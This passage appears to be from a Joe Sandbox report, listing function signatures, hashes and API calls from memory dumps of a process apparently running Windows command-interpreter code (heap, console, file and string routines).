                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcscmp
                                                                    • String ID: *.*$????????.???
                                                                    • API String ID: 3392835482-3870530610
                                                                    • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                    • Instruction ID: a6203680d9c5ac0e17b5cb07de581dd39383f61256d227397a4d7db11017e5c4
                                                                    • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                    • Instruction Fuzzy Hash: 7311C625B24E6281E768AF16A480539B2B2EB44B94F995030CE4D47B45DE3DE8469770
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: fprintf
                                                                    • String ID: CMD Internal Error %s$%s$Null environment
                                                                    • API String ID: 383729395-2781220306
                                                                    • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                    • Instruction ID: 1cde4512c03e159e42e01ea4159912caf8bfb7adfdea4219fda161985b03c435
                                                                    • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                    • Instruction Fuzzy Hash: B6113D3190CA42D5EA55AF14E9450B9E272EB44BF8FD45331D6B9432E4AF2CE44BC370
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: iswspacewcschr
                                                                    • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                    • API String ID: 287713880-1183017076
                                                                    • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                    • Instruction ID: 2b6a5b5a85131d0b4fe4d41476b1687743c527cf971aa9c071073dc20df5d237
                                                                    • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                    • Instruction Fuzzy Hash: 68F0A429A1CE5285EA68AF11A400179E5B2FF48F68FC59132D94E42345EF2CD44AC230
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                    • API String ID: 1646373207-2530943252
                                                                    • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                    • Instruction ID: 6f20fb6db6a4816b999a30e2ad98a2d0084ad259ca44cea826f4d0943363bc91
                                                                    • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                    • Instruction Fuzzy Hash: EC011225E09E0695FA48EF10A851134A2B2EF55738FC41776D53E013E0DF3CA44B8334
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: RaiseFailFastException$kernelbase.dll
                                                                    • API String ID: 1646373207-919018592
                                                                    • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                    • Instruction ID: c3c493a7648aa3d14aacf69170265ec905598243e51852cec95cf1c89a6f622b
                                                                    • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                    • Instruction Fuzzy Hash: 8FF03021618B81D6E600AF12F444079EA71FF89BE4B84A175DD4E07714DF3CD55AC724
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$CurrentDirectorytowupper
                                                                    • String ID:
                                                                    • API String ID: 1403193329-0
                                                                    • Opcode ID: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                    • Instruction ID: d3004d954626c1a8978a53b92c2485b6dec5d1cf05312612492a2ea7203c859b
                                                                    • Opcode Fuzzy Hash: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                    • Instruction Fuzzy Hash: 5661C032A08B828AE724EF65D8402ADB7B6FB4476CF904135DE5D03B99DF38D44AC720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsnicmp$wcschr
                                                                    • String ID:
                                                                    • API String ID: 3270668897-0
                                                                    • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                    • Instruction ID: 1a25cdf23fe0f66b7f5e141552845df6a6602758f6c8976b0bdd42f1e686fe4e
                                                                    • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                    • Instruction Fuzzy Hash: 12515111E08E4281EA69BF159810179E3B3EF55FA8FD89131DA5E072E5DE2CE94EC370
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$DriveFullNamePathType
                                                                    • String ID:
                                                                    • API String ID: 3442494845-0
                                                                    • Opcode ID: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                    • Instruction ID: 40f0bb4c54e6a90ed2f309d3adb3cb1ecf6ab43f5cd5f37bc387eb85ae086f18
                                                                    • Opcode Fuzzy Hash: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                    • Instruction Fuzzy Hash: A7318C32605B818AEB60DF11E8406E9B3A5FB88B98F844036EA4D47B54CF38D60AC760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                    • String ID:
                                                                    • API String ID: 140117192-0
                                                                    • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                    • Instruction ID: 2db3b0e9eede0656ef6a3fa7379e5089570cc34d2e4de6c58acb08496854c24f
                                                                    • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                    • Instruction Fuzzy Hash: 9341E935608F0189EA50AF08F9A0365B376FB997A8F900175EA8D43764DF3CD44AC730
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcstol$lstrcmp
                                                                    • String ID:
                                                                    • API String ID: 3515581199-0
                                                                    • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                    • Instruction ID: 1cc39d0a44fe1e9cff6cbe3363f7785364faac4c2b69d0b3552f7679431f4340
                                                                    • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                    • Instruction Fuzzy Hash: F521A732A08F42C3F6A86F7994D4139EBB1FB59768F856134DB4F02654CE6CEC4A8631
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: File_get_osfhandle$TimeWrite
                                                                    • String ID:
                                                                    • API String ID: 4019809305-0
                                                                    • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                    • Instruction ID: 0b04f80bcec1080ca38b2a4b03a9f7410c094e7f55ed692d0b437a07dfee1f49
                                                                    • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                                    • Instruction Fuzzy Hash: 5031B721A08F42C6E7606F15944133DE6B2AF4ABB8F845539DA0D437D5CF3CD44A8730
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$DriveNamePathTypeVolume
                                                                    • String ID:
                                                                    • API String ID: 1029679093-0
                                                                    • Opcode ID: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                    • Instruction ID: c54a3386b8b61cf9b9e1f593863afc16318b7945b791df1ccefd70b26ee3c787
                                                                    • Opcode Fuzzy Hash: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                    • Instruction Fuzzy Hash: 94315A32705E818AEB209F25D8943E8B7A1FB89B98F854179CA4D47748DF3CD64AC720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                    • String ID:
                                                                    • API String ID: 2448200120-0
                                                                    • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                    • Instruction ID: 33983bc0c667d8350ab8184400a2cff3802c328bd644c7a8ecbd60de072b82be
                                                                    • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                    • Instruction Fuzzy Hash: F1212931A08F42CAE615BF11A81117DF6B2BB84BA9F844175DA0943795CF3CE44A8B30
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1617791916-0
                                                                    • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                    • Instruction ID: c6359df49aa59239c6d117ea808aac6f3d890cbf7cab6b35c0176df4aeec8e43
                                                                    • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                    • Instruction Fuzzy Hash: 18216561708F418AEA08AF51A500479F7B2FF89BF5B959230DA1E07755DF3CE40A8730
                                                                    APIs
                                                                      • Part of subcall function 00007FF719673C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF719673D0C
                                                                      • Part of subcall function 00007FF719673C24: towupper.MSVCRT ref: 00007FF719673D2F
                                                                      • Part of subcall function 00007FF719673C24: iswalpha.MSVCRT ref: 00007FF719673D4F
                                                                      • Part of subcall function 00007FF719673C24: towupper.MSVCRT ref: 00007FF719673D75
                                                                      • Part of subcall function 00007FF719673C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF719673DBF
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71968EA0F,?,?,?,00007FF71968E925,?,?,?,?,00007FF71966B9B1), ref: 00007FF719666ABF
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF719666AD3
                                                                      • Part of subcall function 00007FF719666B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF719666AE8,?,?,?,00007FF71968EA0F,?,?,?,00007FF71968E925), ref: 00007FF719666B8B
                                                                      • Part of subcall function 00007FF719666B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF719666AE8,?,?,?,00007FF71968EA0F,?,?,?,00007FF71968E925), ref: 00007FF719666B97
                                                                      • Part of subcall function 00007FF719666B84: RtlFreeHeap.NTDLL ref: 00007FF719666BAF
                                                                      • Part of subcall function 00007FF719666B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719666AF1,?,?,?,00007FF71968EA0F,?,?,?,00007FF71968E925), ref: 00007FF719666B39
                                                                      • Part of subcall function 00007FF719666B30: RtlFreeHeap.NTDLL ref: 00007FF719666B4D
                                                                      • Part of subcall function 00007FF719666B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719666AF1,?,?,?,00007FF71968EA0F,?,?,?,00007FF71968E925), ref: 00007FF719666B59
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71968EA0F,?,?,?,00007FF71968E925,?,?,?,?,00007FF71966B9B1), ref: 00007FF719666B03
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF719666B17
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                    • String ID:
                                                                    • API String ID: 3512109576-0
                                                                    • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                    • Instruction ID: 461c3cf642356d3b8283bb818d5b223bfd093a3d7949af40759b5f0080e2f705
                                                                    • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                    • Instruction Fuzzy Hash: E4217161A09E82C5EB04FF65E4142B8BBB2EB59B59F944035CA0E07351DF2C984B8370
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966AF82), ref: 00007FF71966B6D0
                                                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966AF82), ref: 00007FF71966B6E7
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966AF82), ref: 00007FF71966B701
                                                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966AF82), ref: 00007FF71966B715
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocSize
                                                                    • String ID:
                                                                    • API String ID: 2549470565-0
                                                                    • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                    • Instruction ID: 5c778dcaafdac7ffc9f25298221aa6bf97a2dc2a779a1fa3bfd7e90f8cf99891
                                                                    • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                    • Instruction Fuzzy Hash: C7210625909F42C6EA14AF25E45007CEAB2FB44BA8BC89431DA0E03754DF3CE54B8730
                                                                    APIs
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF71967507A), ref: 00007FF71968D01C
                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF71967507A), ref: 00007FF71968D033
                                                                    • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF71967507A), ref: 00007FF71968D06D
